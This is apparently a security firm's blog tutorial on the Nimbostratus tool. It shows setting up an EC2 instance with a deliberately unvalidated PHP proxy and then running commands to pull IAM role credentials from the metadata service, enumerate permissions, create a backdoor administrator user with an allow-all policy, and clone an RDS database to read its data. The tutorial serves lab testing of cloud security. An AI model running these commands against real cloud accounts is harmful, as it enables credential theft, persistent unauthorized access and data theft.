Introduction
Nimbostratus is a tool developed by Andres Riancho for fingerprinting and exploiting Amazon cloud infrastructures. Nimbostratus uses any application level HTTP proxy vulnerability to enumerate the instance and credentials from the metadata service which is available to all the instances in EC2. This tool-set can be tested on nimbostratus-target, which helps you set up a legal environment where the enumeration can be performed. If you were wondering what Nimbostratus means, Nimbostratus is the name of an actual cloud. In this article, we will see how to install Nimbostratus and Nimbostratus-target, set up the target environment and then enumerating the target for further exploitation.
Installation
Installing Nimbostratus
git clone [email protected]:andresriancho/nimbostratus.git cd nimbostratus pip install -r requirements.txt
Installing nimbostratus-target
sudo apt-get install python-mysqldb git clone [email protected]:andresriancho/nimbostratus-target.git cd nimbostratus-target pip install -r requirements.txt
Prerequisites
Amazon AWS account:
The primary requirement for testing nimbostratus is to create an AWS account and create your access keys. You can create a free AWS account. I would request you to go through the limitations of a free tier account to avoid unpredicted charges.
Creating a user:
To create a user select users from the left-hand pane in your IAM management console. Create a new user and assign Programmatic access. In the following page select Attach existing policies directly and assign a policy like AdministratorAccess. Go to the next page and review your chosen options and proceed to create your user.
Creating your access keys:
These are the access keys that will be required for our post-exploitation process. Once a user is created you will receive your credentials which will comprise of an access key and a secret key. You can additionally view your access credentials by selecting the particular user that was created.
Boto library:
Boto is a Python package that provides interfaces to Amazon Web Services. Currently, all features work with Python 2.6 and 2.7. Nimbostratus is developed using the great boto library for accessing Amazon’s API.
Usage
Dump EC2 meta-data
This function basically depends on the meta-data service and a web application with an HTTP proxy vulnerability running on the instance. After the HTTP proxy is exploited, we can use this vulnerability to send requests to metadata service from the attacker machine. For this demonstration, we will set up a simple ubuntu instance with apache and php running a vulnerable web app that has a vulnerable proxy function.
Setting up the target instance
In this demo, we will be creating our own target and will not be using the nimbostratus-target. You can also perform the same operations on an instance setup using nimbostratus-target. The first step in creating a target is creating an IAM role which will be attached to a new EC2 instance running an Ubuntu OS. Launch the instance using the EC2 AWS console with an IAM role configured.
Next, we will have to set up a vulnerable web app on the target machine. Log into the target machine through ssh and run the following steps,
For this demo, we will create a php file with an un-validated proxy function. Let’s use a simple php proxy script (greenido’s php proxy script from here) to create an index.php file inside the var/www/html folder.
Log into the instance using ssh, navigate to the var/www/html
sudo apt install apache2 sudo apt install php sudo chmod -R a+rw /var/www cd /var/www/html curl https://gist.githubusercontent.com/greenido/2689639/raw/d95439f6dff5b8d0964366e69106226133900f9b/cUrl_proxy.php >> index.php sudo service apache2 restart
Now we have an EC2 instance which is running a vulnerable HTTP web proxy. The greenido’s php script has an ‘url’ parameter which will contain the URL to be connected through the proxy.
We can test this by opening the public IP address of the instance through the browser in our machine ( The attacker’s machine)
Fingerprinting using dump-ec2-metadata function
Now, we are ready with a vulnerable EC2 instance which will act as a target for our demonstration.
Nimbostratus has a python file called mangle.py inside the core -> utils folder which has to be updated with the target URL.
Insert the target’s proxy vulnerable URL in the VULN_URLvariable and save the file. Now, let’s run the dump-metadata function using the updated mangle function.
./nimbostratus -v dump-ec2-metadata --mangle-function=core.utils.mangle.mangle
Nimbostratus queries the instance’s meta data service to gather all the data which is available
We can see that the dump-ec2-metadata function of the nimbostratus dumps all the data available in the metadata server. We can also see that the output contains other juicy information like the Access key and secret of the IAM role attached to this instance.
Dump credentials:
This function will enumerate the meta-data service of the target using the mangle function and retrieve any access key credentials that found on the meta-data server.
./nimbostratus -v dump-credentials --mangle-function=core.utils.mangle.mangle
Once we are able to enumerate the Access keys of the IAM role attached to the Instance, we can further enumerate the permissions present on the IAM role account using the dump-permissions function.
Dump permissions:
This tool will dump all permissions for the provided credentials. This tool is preferably used right after dump-credentials to know which permissions are available for you. Let’s imagine that the IAM role a lenient policy, a successful execution of the command would look like:
./nimbostratus dump-permissions --access-key=**************PXXQ --secret-key=******************************** --token ********************************************
Create a new user:
While exploitation, if you’ve got credentials of a root user or if the IAM role had administrative access policy tied to it, this will allow you to create a new user using IAM. This tool will create it, assigning the new user with permissions to access all Amazon resources and returns the Access key and secret. It assigns a random name to the created user and attaches a policy which looks like this:
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": "*",
"Resource": "*"
}
]
}
We will execute this command and demonstrate it’s function
./nimbostratus -v create-iam-user --access-key **************UFUA --secret-key **************************************DDxSZ --token ****************************************tecaoI
We can see the new user created in IAM console,
This user account can be used for further exploitation and for maintaining access to the resources.
Create a Database Snapshot:
Amazon RDS is Amazon Relational Database Service (Amazon RDS) which makes it easy to set up, operate, and scale a relational database in the cloud. It provides cost-efficient and resizable capacity while automating time-consuming administration tasks such as hardware provisioning, database setup, patching and backups.
For testing this section, we will have to create a DB instance in RDS. Make sure you follow the details in https://aws.amazon.com/rds/free/ to create a DB instance under Amazon Free Tier.
Basically, the snapshot-rds function is used to create a snapshot of a DB instance running in AWS RDS and restores the snapshot on a new DB instance with a user-provided password. This will help the user to access the contents of the database instance without knowing the master database password. Please note that the latest AWS API do not support the modifying VPC information of the DB instance, please use API versions between 2012-01-15 and 2012-10-31 to use that functionality.
We would need the know if there is a DB instance running on the AWS, its name, and its region. We will use the newly created admin user account which we created using create-iam-user function in the previous step for this function. We will also provide the master password for the cloned DB instance which we can use later to connect to that instance.
./nimbostratus -v snapshot-rds --access-key ********AUFUA --secret-key *****************************yDDxSZ --token ************************************************K2g2QU= --rds-name testdb --password ********* --region us-west-2
This creates a snapshot and restores that snapshot as a separate instance in RDS
Nimbostratus can also be created a VPC on the RDS instance which will allow anyone on the internet to access it as root with the password provided.
This cloned RDS instance can be connected remotely from the attacker machine using the instance details and password that we provided and this DB can be used for exploitation.
Conclusion
Nimbostratus is an amazing post exploitation tool to enumerate and fingerprint AWS resources. It can also exploit the instances if there are insecure default configurations on tools such as celery running in the instance. Thank you for reading! – Setu Parimi, Steve George & Indranil Roy
Sign up for the blog directly here.
Check out our professional services here.
Feedback is welcome! For professional services, fan mail, hate mail, or whatever else, contact [email protected]
